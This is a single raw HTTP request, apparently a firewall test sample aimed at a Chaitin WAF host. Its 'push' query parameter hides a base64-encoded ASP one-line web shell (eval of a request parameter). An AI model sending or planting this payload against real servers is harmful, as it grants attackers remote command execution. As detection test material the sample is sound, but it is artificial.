GET /permanent/schema/mapping/detect/heterogeneous?failover=replica&push=PCVldmFsIHJlcXVlc3QoInNiIiklPg%3D%3D HTTP/1.1
Host: waf-ce.chaitin.cn
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0.2 Waterfox/40.0.2
Cookie: traversal=offer; context=notation; element=hyphen; SESSIONID=809e6ec15fc64af0979c46a5e56125f6dd6c5e71439bf1ba64eeae6f3284d13bc5860f265379602949b695b620a8f446

